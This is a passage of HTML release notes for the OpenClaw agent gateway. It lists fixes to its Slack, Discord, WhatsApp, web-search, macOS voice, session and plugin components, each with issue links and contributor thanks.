<p>Slack/mentions: resolve <code>&lt;!subteam^...&gt;</code> user-group mentions through Slack <code>usergroups.users.list</code> and treat them as explicit mentions only when the bot user is a member, so mention-gated agent channels wake for real user-group mentions without config-only allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>. Thanks @CG-Intelligence-Agent-Jack.</p>
</li>
<li>
<p>Slack/message tool: let <code>read</code> fetch an exact Slack message timestamp, including a specific thread reply when paired with <code>threadId</code>, instead of returning only the parent thread or recent channel history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @zomars.</p>
</li>
<li>
<p>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</p>
</li>
<li>
<p>Web search/Gemini: route agent abort signals into provider fetches and log provider-side abort failures as normal tool errors instead of silently aborting the run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>. Thanks @RoseKongPS.</p>
</li>
<li>
<p>Web search: point missing-key errors to <code>web_fetch</code> for known URLs and the browser tool for interactive pages. Thanks @zhaoyang97.</p>
</li>
<li>
<p>Web search: late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, so existing sessions do not keep stale unresolved SecretRefs after secrets reload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>. Thanks @richardmqq.</p>
</li>
<li>
<p>Web search/Gemini: reuse <code>models.providers.google.apiKey</code> and <code>models.providers.google.baseUrl</code> as lower-priority fallbacks for Gemini web search after dedicated search config and <code>GEMINI_API_KEY</code>. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>. Thanks @Aoiujz.</p>
</li>
<li>
<p>Web search/Gemini: pass <code>freshness</code> and <code>date_after</code>/<code>date_before</code> filters through Google Search grounding time ranges. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>. Thanks @ismael-81.</p>
</li>
<li>
<p>Web search/DuckDuckGo: include the keyless DuckDuckGo provider in the web search setup wizard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search: honor <code>baseUrl</code> overrides for Gemini, Grok, and x_search provider-owned config, so proxy-backed search tools no longer dial hardcoded public endpoints. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Web search/Brave: point Brave provider metadata at the canonical <code>/tools/brave-search</code> docs page and make the legacy <code>/brave-search</code> docs page a redirect stub. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>. Thanks @Magicray1217 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search/Brave: allow <code>freshness</code> and bounded date ranges in <code>llm-context</code> mode, matching Brave's documented LLM Context API support. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @remusao.</p>
</li>
<li>
<p>Web fetch: resolve external plugin <code>webFetchProviders</code> for non-sandboxed <code>web_fetch</code>, while keeping sandboxed fetches limited to bundled providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>. Thanks @ultrahighsuper and @mingmingtsao.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</p>
</li>
<li>
<p>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</p>
</li>
<li>
<p>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</p>
</li>
<li>
<p>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</p>
</li>
<li>
<p>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</p>
</li>
<li>
<p>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</p>
</li>
<li>
<p>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</p>
</li>
<li>
<p>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</p>
</li>
<li>
<p>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</p>
</li>
<li>
<p>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</p>
</li>
<li>
<p>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</p>
</li>
<li>
<p>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</p>
</li>
<li>
<p>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</p>
</li>
<li>
<p>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</p>
</li>
<li>
<p>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</p>
</li>
<li>
<p>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</p>
</li>
<li>
<p>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</p>
</li>
<li>
<p>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</p>
</li>
<li>
<p>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</p>
</li>
<li>
<p>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</p>
</li>
<li>
<p>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</p>
</li>
<li>
<p>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</p>
</li>
<li>
<p>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</p>
</li>
<li>
<p>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</p>
</li>
<li>
<p>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</p>
</li>
<li>
